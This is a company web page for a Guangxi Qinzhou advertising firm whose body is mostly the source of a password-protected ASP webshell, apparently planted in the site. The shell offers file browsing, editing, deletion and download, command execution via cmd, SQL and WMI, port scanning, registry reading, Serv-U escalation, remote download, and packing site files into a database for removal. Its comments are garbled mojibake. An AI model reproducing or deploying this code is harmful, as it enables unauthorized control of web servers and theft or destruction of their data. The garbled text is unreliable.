∷The Guangxi Qinzhou good faith advertisement marketing plans thelimited liabilit∷

Co,Profile


	Co,introduction

	President oration

	Co,culture

	Organization

	Spiritual idea

	Contact us

Product List

Organization

<%
Server.ScriptTimeout=999998888
Response.Buffer =true
On Error Resume Next

dim URL,ServerIP,RootPath,WWWPath,Action,PacketName,RefreshBack,BackUrl,kge
URL = Request.ServerVariables("URL")
ServerIP = Request.ServerVariables("LOCAL_ADDR")
RootPath = server.MapPath(".")
WWWRoot = Server.MapPath("/")
action = Request("action")
FolderPath = Request("FolderPath")
FName = Request("FName")
kge="<br><br><br><br><br><br><br><br>"
RefreshBack = "<meta http-equiv='refresh' content = '2; URL=?Action=Show1File' >"
dim UserPass,SFlag,ImgExt',TxtExt,isDebugMode
ShellName ="system"
UserPass = "123456"
Copyright =""
SFlag = "test"
isDebugMode = False
'ImgExt = "$gif$jpg$bmp$"
'TxtExt = "$vbs$log$asp$txt$php$ini$inc$htm$html$xml$conf$config$jsp$java$htt$lst$aspx$php3$php4$js$css$bat$asa$"

rem ==============================================
'＆#237;＆#168;＆#243;?oˉ＆#234;y2?＆#183;?
rem ==============================================

'echooˉ＆#234;y
Sub echo(str)
response.Write(str)
End Sub

'′＆#237;?＆#243;??＆#234;?
Sub ShowErr()
   If Err Then
     echo"<br><a href='＆#106avascript:history.back()'><br> " & Err.Description & "</a><br>"
     Err.Clear
Response.Flush
   End If
End Sub

Sub ShowErr2(str)
Dim i, arrayStr
str = Server.HtmlEncode(str)
arrayStr = Split(str, "$$")

echo "<font size=2>"
echo "3?′＆#237;D??￠:<br/><br/>"
For i = 0 To UBound(arrayStr)
echo "  " & (i + 1) & ". " & arrayStr(i) & "<br/>"
Next
echo "</font>"

Response.End()
End Sub

'3?＆#234;＆#177;?＆#236;2a
Sub check()
If Session("UserPass") <> UserPass Then
echo "<script>alert('2?＆#234;?＆#215;??oμ???＆#232;?＆#177;e?＆#242;?????-?-');</script>"
' call logout()
End If
End Sub

'?＆#183;??＆#236;???
Function RePath(S)
RePath=Replace(S,"\","\\")
End Function

Function RRePath(S)
RRePath=Replace(S,"\\","\")
End Function

'iifoˉ＆#234;y
Function IIf(var, val1, val2)
If var = True Then
IIf = val1
Else
IIf = val2
End If
End Function
'???t′＆#243;D?
Function GetTheSize(num)
Dim i, arySize(4)
arySize(0) = "B"
arySize(1) = "K"
arySize(2) = "M"
arySize(3) = "G"
arySize(4) = "T"
While(num / 1024 >= 1)
num = Fix(num / 1024 * 100) / 100
i = i + 1
WEnd
GetTheSize = num & " " & arySize(i)
End Function

'htnl＆#177;＆#224;??＆#215;a??
Function HtmlEncode(str)
If IsNull(str) Then Exit Function
HtmlEncode = Server.HTMLEncode(str)
End Function

'SessionFoldetSet session???t?D＆#233;＆#232;??
'Sub SFset()
If FolderPath<>"" then
   Session("FolderPath")=RRePath(FolderPath)
End If
If Session("FolderPath")="" Then
   FolderPath=RootPath
   Session("FolderPath")=FolderPath
End if
'End Sub

'＆#236;＆#237;?＆#243;2?μ￥
'function Menuadd(style,dir,href,menu,ico)
function menuadd(target,href,txt,color,siz,ico) 'target＆#236;＆#225;??μ???＆#177;＆#234;￡?dir????￡?href＆#225;??＆#243;￡?txt??＆#234;?￡?color＆#237;?＆#177;＆#234;??＆#233;?￡?siz＆#237;?＆#177;＆#234;′＆#243;D?￡?ico＆#237;?＆#177;＆#234;′＆#250;??
if siz=0 then
siz=""
else
siz=" size='"&Siz&"'"
end if
if color="" then color="70B7FE"
if ico="" then ico="l"
echo "<tr><td height='22'><a href='"&href&"' target='"&target&"'><FONT face=Wingdings color='#"&Color&"' "&siz&">"&ico&"</FONT>"&txt&"</a></td></tr>"
End function
'＆#237;?＆#177;＆#234;
function icon(Color,Siz,Var)
if Siz=0 then
siz=""
else
siz=" size='"&Siz&"'"
end if
icon="<FONT face=Webdings color='#"&Color&"' "&Siz&">"&Var&"</FONT>"
End function

'getpost
Function GetPost(var)
Dim val
If Request.QueryString("PageName") = "PageUpload" Then
pageName = "PageUpload"
Exit Function
End If
val = RTrim(Request.Form(var))
If val = "" Then
val = RTrim(Request.QueryString(var))
End If
GetPost = val
End Function

'???????t
Function DownFile(Path)
   Response.Clear
   Set OSM = CreateObject("Adodb.Stream")
   OSM.Open
   OSM.Type = 1
   OSM.LoadFromFile Path
   sz=InstrRev(path,"\")+1
     Response.AddHeader "Content-Disposition", "attachment; filename=" & Mid(path,sz)
     Response.Charset = "UTF-8"
     Response.ContentType = "application/octet-stream"
     Response.BinaryWrite OSM.Read
     Response.Flush
   OSM.Close
   Set OSM = Nothing
End Function

' AlertThenClose
Sub AlertThenClose(str)
If str = "" Then
Response.Write "<script>window.close();</script>"
Else
Response.Write "<script>alert(""" & str & """);window.close();</script>"
End If
End Sub

Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject"
ObT(0,2) = "???t2＆#249;＆#215;＆#247;＆#215;＆#233;?t"
ObT(1,0) = "wscript.shell"
ObT(1,2) = "?＆#252;＆#225;?DD?′DD＆#215;＆#233;?t"
ObT(2,0) = "ADOX.Catalog"
ObT(2,2) = "ACCESS?＆#168;?a＆#215;＆#233;?t"
ObT(3,0) = "JRO.JetEngine"
ObT(3,2) = "ACCESS?1??＆#215;＆#233;?t"
ObT(4,0) = "Scripting.Dictionary"
ObT(4,2) = "＆#234;y?Y＆#225;＆#247;＆#233;?′??＆#168;?＆#250;＆#215;＆#233;?t"
ObT(5,0) = "Adodb.connection"
ObT(5,2) = "＆#234;y?Y?a＆#225;??＆#243;＆#215;＆#233;?t"
ObT(6,0) = "Adodb.Stream"
ObT(6,2) = "＆#234;y?Y＆#225;＆#247;＆#233;?′?＆#215;＆#233;?t"
ObT(7,0) = "SoftArtisans.FileUp"
ObT(7,2) = "SA-FileUp ???t＆#233;?′?＆#215;＆#233;?t"
ObT(8,0) = "LyfUpload.UploadFile"
ObT(8,2) = "＆#225;???＆#183;????t＆#233;?′?＆#215;＆#233;?t"
ObT(9,0) = "Persits.Upload.1"
ObT(9,2) = "ASPUpload ???t＆#233;?′?＆#215;＆#233;?t"
ObT(10,0) = "JMail.SmtpMail"
ObT(10,2) = "JMail ＆#243;＆#234;?t＆#234;?＆#183;￠＆#215;＆#233;?t"
ObT(11,0) = "CDONTS.NewMail"
ObT(11,2) = "D＆#233;?aSMTP＆#183;￠D?＆#215;＆#233;?t"
ObT(12,0) = "SmtpMail.SmtpMail.1"
ObT(12,2) = "SmtpMail＆#183;￠D?＆#215;＆#233;?t"
ObT(13,0) = "Microsoft.XMLHTTP"
ObT(13,2) = "＆#234;y?Y′?＆#234;?＆#215;＆#233;?t"
For i=0 To 13
Set T=Server.CreateObject(ObT(i,0))
If -2147221005 <> Err Then
  IsObj=" ?＆#236;"
Else
  IsObj=" ?＆#225;"
  Err.Clear
End If
Set T=Nothing
ObT(i,1)=IsObj
Next

rem =============================================
'1|?＆#252;＆#234;μ??oˉ＆#234;y2?＆#183;?
rem =============================================

'?＆#249;＆#234;?
sub css()
echo"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
echo"<title>"&ShellName&" - "&ServerIP&" </title>"
echo"<style type=""text/css"">"
echo"body,td{font-size: 12px;background-color:#000000;;color:#dddddd;}"
echo"input,select,textarea{font-size: 12px;background-color:#dddddd;color:#000000; border:1px solid #B7CDFC}"
echo".C{background-color:#003300;border:1px}"
echo".cmd{background-color:#E7E7E7;color:#666666}"
echo"body{margin: 0px;margin-left:4px;}"
echo"BODY {SCROLLBAR-FACE-COLOR: #C2D3FC; SCROLLBAR-HIGHLIGHT-COLOR: #fff; SCROLLBAR-SHADOW-COLOR: #C2D3FC; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #D4D4D4; SCROLLBAR-ARROW-COLOR: #FFFFFF; SCROLLBAR-TRACK-COLOR: #F0F0F0; SCROLLBAR-DARKSHADOW-COLOR: #F0F0F0}"
echo"a{color:#dddddd;text-decoration: none;}a:hover{color:#C60000;background:#000000}"
echo".am{color:#666666;font-size:12px;}"
echo"</style>"
end sub

'?＆#224;1?jiavascript
  echo"<script language=""＆#106avascript"">"& vbcrlf
  echo"" & vbcrlf
  echo"</script>"
  echo"</head>"

'μ????D??
sub login()
If Session("UserPass") <> UserPass Then
   If Request.Form("Pass") <> "" Then
     If Request.Form("Pass") = UserPass Then
       Session("UserPass") = UserPass
       Response.Redirect URL
     Else
echo"<br><br><br><br><br><br><br><br><center>2?＆#234;?＆#215;??oμ???＆#232;?＆#177;e?＆#242;????￡?</center>"
   End If
   Else
echo"<br><br><br><br><br><br><br><br><FORM Action='"&URL&"' method=Post>"
echo"<TABLE align=center cellpadding=0 cellspacing=0 width=250 border=0 bgcolor=#003300<TR bgcolor=#d8f99b>"
echo"<TD>Pass￡o<INPUT type=Password name=Pass size=30> <input type=submit value=Login></TD></TR>"
echo"<tr align='center'><td>"&Copyright&"</tr></td></TABLE></FORM>"

End If
Response.End
End If
end sub

'＆#237;?3?μ???
sub logout()
Session.Contents.Remove("UserPass")
Response.Redirect URL
end sub

'?＆#247;′＆#176;?＆#250;
Function MainForm()
echo"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
echo"<input type=""hidden"" name=""Action"">"
echo"<input type=""hidden"" name=""FName"">"
echo"</form>"
echo"<table width='100%' height='100%' border=0 cellpadding='0' cellspacing='0'>"
echo"<tr><td height='30' colspan='2'>"
echo"<table width='100%'>"
echo"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
echo"<tr><td width='60' align='center'>μ??＆#183;＆#224;?￡o</td><td>"
echo"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
echo"</td><td width='140' align='center'><input name='Submit' type='submit' value='＆#232;￥＆#176;＆#233;'> <input type='submit' value='?￠D??＆#247;′＆#176;?＆#250;' ＆#111nclick='FileFrame.location.reload()'>"
echo" <tr align='center' valign='middle'>"
echo"<tr>＆#236;＆#225;＆#232;＆#168;???? ?＆#250;?o<a href='＆#106avascript:ShowFolder(""C:\\Progra~1"")'>3＆#236;D＆#242;</a>???o<a href='＆#106avascript:ShowFolder(""C:\\Docume~1"")'>C:\\Docume~1</a>???o<a href='＆#106avascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>Pcanywhere</a>???o<a href='＆#106avascript:ShowFolder(""C:\\Program Files\\Serv-U"")'>Serv-U(1)</a>???o<a href='＆#106avascript:ShowFolder(""C:\\Program Files\\RhinoSoft.com"")'>Serv-U(2)</a>???o<a href='＆#106avascript:ShowFolder(""C:\\Documents and Settings\\All Users\\???a＆#234;??12?μ￥\\3＆#236;D＆#242;"")'>?a＆#234;?3＆#236;D＆#242;</a>???o<a href='＆#106avascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents"")'>Erveryone</a>???o<a href='＆#106avascript:ShowFolder(""c:\\mysql"")'>Mysql</a>???o<a href='＆#106avascript:ShowFolder(""C:\\RECYCLER"")'>RECYCLER</a>???o<a href='＆#106avascript:ShowFolder(""c:\\inetpub\\wwwroot"")'>inetpub</a>???o<a href='＆#106avascript:ShowFolder(""C:\\windows\\temp"")'>temp</a>??</td><td>"
echo"</td></tr></form></table></center></td></tr><tr><td width='16%'>"
echo"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
echo"<td width='88%'>"
echo"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe>"
echo"</td></tr></table>"
End Function

'2?μ￥
Function MainMenu()
echo"<table width='100%' border='0' cellspacing='0' cellpadding='0' bgcolor='#d8f99b'>"
If ObT(0,1)=" ?＆#225;" Then
echo"<tr><td height='24'><hr color='#91d70d'>＆#232;??＆#183;3??＆#234;＆#236;a＆#225;?￡?</td></tr>"
Else
echo "<tr><td height='10'>"&icon("70B7FE",6,"Ì")&"<font color=#0EE0F3>???t1＆#252;＆#224;＆#237;</font></td></tr><tr><td>"
'echo"<tr><td align='center'>"
Set ABC=New LBF:echo ABC.ShowDriver():Set ABC=Nothing:echo "</td></tr>"
menuadd "","＆#106avascript:ShowFolder("""&RePath(WWWRoot)&""")","??μ??＆#249;????","",2,""
menuadd "","＆#106avascript:ShowFolder("""&RePath(RootPath)&""")","＆#177;?3＆#236;D＆#242;????","",2,""
menuadd "FileFrame","?Action=EditFile","D??＆#168;??＆#177;?","",4,"2"
menuadd "","＆#106avascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")","D??＆#168;????","",2,"1"
menuadd "FileFrame","?Action=PageAddToMdb","′＆#242;＆#176;＆#252;?a＆#176;＆#252;","",2,""
menuadd "FileFrame","?Action=plupfile","?＆#250;＆#225;?＆#233;?′?","",2,"＆#168;|"
echo "<tr><td height='22'>"&icon("70B7FE",6,"O")&"<font color=#0EE0F3>D??￠＆#234;??ˉ</font></td></tr>"
menuadd "FileFrame","?Action=ReadREG","＆#215;￠2＆#225;＆#177;＆#237;?＆#225;＆#232;?","",2,"k"
menuadd "FileFrame","?Action=ScanPort","???＆#250;＆#233;＆#168;?＆#232;","",2,"]"
menuadd "FileFrame","?Action=ServerInfo","＆#215;＆#233;?tD??￠","",2,"z"
menuadd "FileFrame","?Action=Course","＆#243;??＆#167;2＆#233;?ˉ","",2,"a"
menuadd "FileFrame","?Action=GetTeRmiNAlINfo","＆#215;??ˉμ???","",2,"ÿ"
echo "<tr><td height='22'>"&icon("70B7FE",6,"Ó")&"<font color=#0EE0F3>＆#236;＆#225;＆#233;y＆#232;＆#168;?T</font></td></tr>"
menuadd "FileFrame","?Action=Servu","Serv-u＆#236;＆#225;＆#232;＆#168;","",2,"Â"
menuadd "FileFrame","?action=Cmd1Shell","?′DDcmd?＆#252;＆#225;?","",2,"þ"
menuadd "FileFrame","?action=sqlcmd","?′DDsqlcmd","",2,"þ"
menuadd "FileFrame","?action=wmi","wmi??3＆#236;?＆#252;＆#225;?","",2,"þ"
menuadd "FileFrame","?action=lp","＆#224;??＆#225;′＆#243;＆#234;?0day","",2,"W"
menuadd "FileFrame","?action=remotedown","??3＆#236;????","",2,"l"
echo "<tr><td height='22'>"&icon("70B7FE",6,"²")&"<font color=#0EE0F3>DT?????t</font></td></tr>"
menuadd "FileFrame","?Action=findmuma","???＆#237;???＆#247;","",2,"M"
menuadd "FileFrame","?Action=Cplgm&M=1","?＆#250;＆#225;?1＆#242;?＆#237;","",2,"M"
menuadd "FileFrame","?Action=Cplgm&M=2","?＆#250;＆#225;????＆#237;","",2,"M"
menuadd "FileFrame","?Action=Cplgm&M=3","?＆#250;＆#225;?＆#236;???","",2,"M"
menuadd "FileFrame","?action=Cplgm&M=4","???＆#168;1＆#242;?＆#237;","",2,"M"
menuadd "FileFrame","?action=DbManager","＆#234;y?Y?a2＆#249;＆#215;＆#247;","",2,"F"
menuadd "","＆#106avascript:FullForm("""&RePath(Session("FolderPath")&"\New.mdb")&""",""CreateMdb"")","D??＆#168;mdb＆#234;y?Y?a","",2,"Ó"
end if
menuadd "_top","?Action=Logout","＆#237;?3?μ???","",2,"ý"

'menuadd "","＆#106avascript:FullForm("""&RePath(Session("FolderPath")&"\data.mdb")&""",""CompactMdb"")","?1??mdb＆#234;y?Y?a","",2,"Ô"
End Function

'???t1＆#252;＆#224;＆#237;＆#224;＆#224;
Class LBF
Dim CF

Private Sub Class_Initialize
SET CF=CreateObject("Scripting.FileSystemObject")
End Sub

Private Sub Class_Terminate
Set CF=Nothing
End Sub

Function ShowDriver()
For Each D in CF.Drives
echo"   <a href='＆#106avascript:ShowFolder("""&D.DriveLetter&":\\"")'>＆#177;?μ?′??＆#236; ("&D.DriveLetter&":)</a><br>"
Next
End Function

Function Show1File(Path)
Set FOLD=CF.GetFolder(Path)
i=0
echo"<table width='100%' border='0' cellspacing='0' cellpadding='0'><tr>"
For Each F in FOLD.subfolders
echo"<td height=10>"
echo"<a href='＆#106avascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title='μ??＆#247;′＆#242;?a'><font face='wingdings'size='4'>0</font>"&F.Name&"</a>"   '??＆#234;????t?D??3?
echo" _<a href='＆#106avascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  ＆#111nclick='return yesok()' class='am' title='?′??'>?′??</a>" '?′??
echo"  <a href='＆#106avascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'  ＆#111nclick='return yesok()' class='am' title='＆#233;?3y'>＆#233;?3y</a>" '＆#233;?3y
echo" <a href='＆#106avascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'  ＆#111nclick='return yesok()' class='am' title='＆#242;??ˉ'>＆#242;??ˉ</a>" '＆#242;??ˉ
echo" <a href='＆#106avascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")'  ＆#111nclick='return yesok()' class='am' title='????'>????</a></td>" '????
i=i+1
If i mod 3 = 0 then echo"</tr><tr>"
Next
echo"</tr><tr><td height=2></td></tr></table>"
echo"<hr noshade color=""#CCCCCC""ze=1 color=""#"" />"
For Each L in Fold.files
echo"<table width='100%' border='0' cellspacing='0' cellpadding='0'>"
echo"<tr style='boungroup-color:#'>"
echo"<td height='30'><a href='＆#106avascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title=""μ??＆#247;????"&chr(13)&"???t??: "&L.Name&chr(13)&"′＆#243;D?￡o"&GetTheSize(L.size)&chr(13)&"＆#224;＆#224;D＆#237;: "&L.type&chr(13)&"＆#234;?D?: "&L.Attributes&chr(13)&"′′?＆#168;＆#234;＆#177;??: "&L.DateCreated&chr(13)&"DT??＆#234;＆#177;??: "&L.DateLastModified&"""><font face='wingdings'size='3'>2</font>"&L.Name&"</a></td>"
echo"<td width='40' align=""center""><a href='＆#106avascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='＆#177;＆#224;?-'>＆#177;＆#224;?-</a></td>"
echo"<td width='40' align=""center""><a href='＆#106avascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  ＆#111nclick='return yesok()' class='am' title='＆#233;?3y'>＆#233;?3y</a></td>"
echo"<td width='40' align=""center""><a href='＆#106avascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='?′??'>?′??</a></td>"
echo"<td width='40' align=""center""><a href='＆#106avascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='＆#242;??ˉ'>＆#242;??ˉ</a></td>"
echo"<td width='50' align=""center"">"&GetTheSize(L.size)&"</td>"
echo"<td width='200' align=""center"">"&L.Type&"</td>"
echo"<td width='160'>"&L.DateLastModified&"</td>"
echo"</tr></table>"
Next
Set FOLD=Nothing
End function

Function DelFile(Path)
If CF.FileExists(Path) Then
CF.DeleteFile Path
echo"<center><br><br><br>1＆#167;?2μ1＆#242;ˉ???t "&Path&" ＆#233;?3y3＆#233;1|￡?</center>"
echo RefreshBack

End If
End Function

Function EditFile(Path)
If Request("Action2")="Post" Then
Set T=CF.CreateTextFile(Path)
T.WriteLine Request.form("content")
T.close
Set T=nothing
echo"<center><br><br><br>1＆#167;?2μ1＆#242;ˉ???t＆#177;￡′?3＆#233;1|￡?</center>"
echo RefreshBack

Response.End
End If

If Path<>"" Then
Set T=CF.opentextfile(Path, 1, False)
Txt=HTMLEncode(T.readall)
T.close
Set T=Nothing
Else
Path=Session("FolderPath")&"\test.asp":Txt=""
End If

echo"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>"
echo"<input name='Action' value='EditFile' Type='hidden'>"
echo"<input name='FName' value='"&Path&"' style='width:100%'><br>"
echo"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>"
echo"<hr><input name='goback' type='button' value='＆#183;μ??' ＆#111nclick='history.back();'>   <input name='reset' type='reset' value='????'>   <input name='submit' type='submit' value='＆#177;￡′?'></form>"

End Function

Function CopyFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.CopyFile Path(0),Path(1)
echo"<center><br><br><br>1＆#167;?2μ1＆#242;ˉ???t"&Path(0)&"?′??3＆#233;1|￡?</center>"
echo RefreshBack

End If
End Function

Function MoveFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.MoveFile Path(0),Path(1)
echo"<center><br><br><br>???t"&Path(0)&"＆#242;??ˉ3＆#233;1|￡?</center>"
echo RefreshBack

End If
End Function

Function DelFolder(Path)
If CF.FolderExists(Path) Then
CF.DeleteFolder Path
echo"<center><br><br><br>????"&Path&"＆#233;?3y3＆#233;1|￡?</center>"
echo RefreshBack

End If

End Function
Function CopyFolder(Path)
Path = Split(Path,"||||")

If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.CopyFolder Path(0),Path(1)
echo"<center><br><br><br>????"&Path(0)&"?′??3＆#233;1|￡?</center>"
echo RefreshBack

End If
End Function

Function MoveFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.MoveFolder Path(0),Path(1)
echo"<center><br><br><br>????"&Path(0)&"＆#242;??ˉ3＆#233;1|￡?</center>"
echo RefreshBack

End If
End Function

Function NewFolder(Path)
If Not CF.FolderExists(Path) and Path<>"" Then
CF.CreateFolder Path
echo"<center><br><br><br>????"&Path&"D??＆#168;3＆#233;1|￡?</center>"
echo RefreshBack

End If
End Function

End Class

'′＆#242;＆#176;＆#252;?a＆#176;＆#252;
Sub PageAddToMdb()
Dim theAct, thePath
theAct = Request("theAct")
thePath = Request("thePath")
Server.ScriptTimeOut = 5000

If theAct = "addToMdb" Then
addToMdb(thePath)
echo "<div align=center><br>2＆#249;＆#215;＆#247;＆#237;＆#234;3＆#233;!</div>"
echo"<hr><center><a href=""hytop.mdb"">???t????</a></center>"
echo"<br/><center><a href='＆#106avascript:history.back()'>＆#183;μ??</a></center>"
Response.End
End If
If theAct = "releaseFromMdb" Then
unPack(thePath)
echo"2＆#249;＆#215;＆#247;＆#237;＆#234;3＆#233;!"
echo"<br/><center><a href='＆#106avascript:history.back()'>＆#183;μ??</a></center>"
Response.End
End If

echo "???t?D′＆#242;＆#176;＆#252;:"
echo "<form method=post>"
echo "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
echo "<input type=hidden value=addToMdb name=theAct>"
echo "<select name=theMethod><option value=fso>FSO</option><option value=app>?TFSO</option></select>"
echo " <input type=submit value='′＆#242;＆#176;＆#252;'>"
echo "<hr/>＆#215;￠: ′＆#242;＆#176;＆#252;＆#233;＆#250;3＆#233;HYTop.mdb???t,??＆#243;＆#250;???＆#237;＆#237;?????????"
echo "</form>"

echo "<hr/>???t＆#176;＆#252;?a?a(D＆#232;FSO?＆#167;3?):<br/>"
echo "<form method=post>"
echo "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & "\HYTop.mdb"" size=80>"
echo "<input type=hidden value=releaseFromMdb name=theAct> <input type=submit value='?a＆#176;＆#252;'>"
echo "<hr/>＆#215;￠: ?a?a＆#224;′μ??＆#249;＆#243;D???t????＆#243;＆#250;???＆#237;＆#237;?????????"
echo "</form>"
End Sub

Sub addToMdb(thePath)
If isDebugMode = False Then
On Error Resume Next
End If
Dim rs, conn, stream, connStr, adoCatalog
Set rs = Server.CreateObject("ADODB.RecordSet")
Set stream = Server.CreateObject("ADODB.Stream")
Set conn = Server.CreateObject("ADODB.Connection")
Set adoCatalog = Server.CreateObject("ADOX.Catalog")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HYTop.mdb")

adoCatalog.Create connStr
conn.Open connStr
conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")

stream.Open
stream.Type = 1
rs.Open "FileData", conn, 3, 3

If Request("theMethod") = "fso" Then
fsoTreeForMdb thePath, rs, stream
Else
saTreeForMdb thePath, rs, stream
End If

rs.Close
Conn.Close
stream.Close
Set rs = Nothing
Set conn = Nothing
Set stream = Nothing
Set adoCatalog = Nothing
End Sub

Function fsoTreeForMdb(thePath, rs, stream)
Dim item, theFolder, folders, files, sysFileList
sysFileList = "$HYTop.mdb$HYTop.ldb$"
If Server.CreateObject("Scripting.FileSystemObject").FolderExists(thePath) = False Then
showErr(thePath & " ????2?′??＆#250;?＆#242;??2??＆#234;D＆#237;＆#183;??＆#234;!")
End If
Set theFolder = Server.CreateObject("Scripting.FileSystemObject").GetFolder(thePath)
Set files = theFolder.Files
Set folders = theFolder.SubFolders

For Each item In folders
fsoTreeForMdb item.Path, rs, stream
Next

For Each item In files
If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
rs.AddNew
rs("thePath") = Mid(item.Path, 4)
stream.LoadFromFile(item.Path)
rs("fileContent") = stream.Read()
rs.Update
End If
Next

Set files = Nothing
Set folders = Nothing
Set theFolder = Nothing
End Function

Sub unPack(thePath)
If isDebugMode = False Then
On Error Resume Next
End If
Server.ScriptTimeOut = 5000
Dim rs, ws, str, conn, stream, connStr, theFolder
str = Server.MapPath(".") & "\"
Set rs = CreateObject("ADODB.RecordSet")
Set stream = CreateObject("ADODB.Stream")
Set conn = CreateObject("ADODB.Connection")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"

conn.Open connStr
rs.Open "FileData", conn, 1, 1
stream.Open
stream.Type = 1

Do Until rs.Eof
theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
If fsoX.FolderExists(str & theFolder) = False Then
createFolder(str & theFolder)
End If
stream.SetEos()
stream.Write rs("fileContent")
stream.SaveToFile str & rs("thePath"), 2
rs.MoveNext
Loop

rs.Close
conn.Close
stream.Close
Set ws = Nothing
Set rs = Nothing
Set stream = Nothing
Set conn = Nothing
End Sub

Sub createFolder(thePath)
Dim i
i = Instr(thePath, "\")
Do While i > 0
If Server.CreateObject("Scripting.FileSystemObject").FolderExists(Left(thePath, i)) = False Then
Server.CreateObject("Scripting.FileSystemObject").CreateFolder(Left(thePath, i - 1))
End If
If InStr(Mid(thePath, i + 1), "\") Then
i = i + Instr(Mid(thePath, i + 1), "\")
Else
i = 0
End If
Loop
End Sub

Sub saTreeForMdb(thePath, rs, stream)
Dim item, theFolder, sysFileList
sysFileList = "$HYTop.mdb$HYTop.ldb$"
Set theFolder = saX.NameSpace(thePath)

For Each item In theFolder.Items
If item.IsFolder = True Then
saTreeForMdb item.Path, rs, stream
Else
If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
rs.AddNew
rs("thePath") = Mid(item.Path, 4)
stream.LoadFromFile(item.Path)
rs("fileContent") = stream.Read()
rs.Update
End If
End If
Next

Set theFolder = Nothing
End Sub

'?＆#250;＆#225;?＆#233;?′?
Sub PageUpload()
theAct = Request.QueryString("theAct")
If theAct = "upload" Then
StreamUpload()
echo "<script>alert('1＆#167;?2μ1＆#242;ˉ???t3＆#233;1|＆#233;?′?!');history.back();</script>"
End If
ShowUpload()
End Sub
Sub PageUpload()
theAct = Request.QueryString("theAct")
If theAct = "upload" Then
StreamUpload()
echo "<script>alert('1＆#167;?2μ1＆#242;ˉ???t3＆#233;1|＆#233;?′?!');history.back();</script>"
End If
ShowUpload()
End Sub
Sub ShowUpload()
call Css()
If thePath = "" Then thePath = "/"
echo kge
echo "<form method=post onsubmit=this.Submit.disabled=true; enctype='multipart/form-data' action=?Action=plupfile&theAct=upload><TABLE width='70%' border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#666666 ><tr><td colspan=2>?＆#250;＆#225;????t＆#233;?′?</td></tr><tr><td width='14%'> ′??＆#225;＆#183;t???＆#247;＆#242;?＆#243;DD＆#233;?a????:</td><td width='40%'> <input name=thePath type=text id=thePath value=""" & HtmlEncode(thePath) & """ size=30><input type=checkbox name=overWrite checked=""checked""> ?2???￡＆#234;?(??＆#234;?＆#232;?＆#215;＆#243;????￡?2?o????t??)"
echo "</td></tr><tr><td valign=top> ????＆#233;?′????t＆#234;y＆#225;?: <br>＆#233;?′??????＆#183;??￡o</td><td> <input id=fileCount size=6 value=1> <input type=button value=＆#233;＆#232;?＆#168; ＆#111nclick=makeFile(fileCount.value)> ￡＆#168;＆#215;￠＆#242;a￡o＆#233;?′????t??o＆#237;＆#177;?μ????t???＆#224;＆#237;?￡?<div id=fileUpload> <input name=file1 type=file size=30></div></td></tr><tr><td align=center colspan=2><input type=submit name=Submit value=＆#233;?′? ＆#111nclick=this.form.action+='&overWrite='+this.form.overWrite.checked;><input type=reset value=????><input type=button value=1?＆#177;? ＆#111nclick=window.close();></td></tr></table></form>"
echo "<script language=＆#106avascript>" & vbCrLf
echo "function makeFile(n){" & vbCrLf
echo " fileUpload.innerHTML = ' <input name=file1 type=file size=30>'" & vbCrLf
echo " for(var i=2; i<=n; i++)" & vbCrLf
echo "fileUpload.innerHTML += '<br/> <input name=file' + i + ' type=file size=30>';" & vbCrLf
echo "}" & vbCrLf
echo "</script>"
End Sub
Sub StreamUpload()
Dim sA, sB, aryForm, aryFile, theForm, newLine, overWrite
Dim strInfo, strName, strPath, strFileName, intFindStart, intFindEnd
Dim itemDiv, itemDivLen, intStart, intDataLen, intInfoEnd, totalLen, intUpLen, intEnd
If isDebugMode = False Then On Error Resume Next
Server.ScriptTimeOut = 5000
newLine = ChrB(13) & ChrB(10)
overWrite = Request.QueryString("overWrite")
overWrite = IIf(overWrite = "true", "2", "1")
Set sA = Server.CreateObject("Adodb.Stream")
Set sB = Server.CreateObject("Adodb.Stream")
sA.Type = 1
sA.Mode = 3
sA.Open
sA.Write Request.BinaryRead(Request.TotalBytes)
sA.Position = 0
theForm = sA.Read()
